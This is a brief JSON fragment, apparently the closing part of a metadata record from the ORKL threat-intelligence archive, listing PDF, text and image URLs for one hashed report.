		"pdf": "https://archive.orkl.eu/4f0595e0f441ec7d4b66741c6ed6878f2d9799b8.pdf",
		"text": "https://archive.orkl.eu/4f0595e0f441ec7d4b66741c6ed6878f2d9799b8.txt",
		"img": "https://archive.orkl.eu/4f0595e0f441ec7d4b66741c6ed6878f2d9799b8.jpg"
	}
}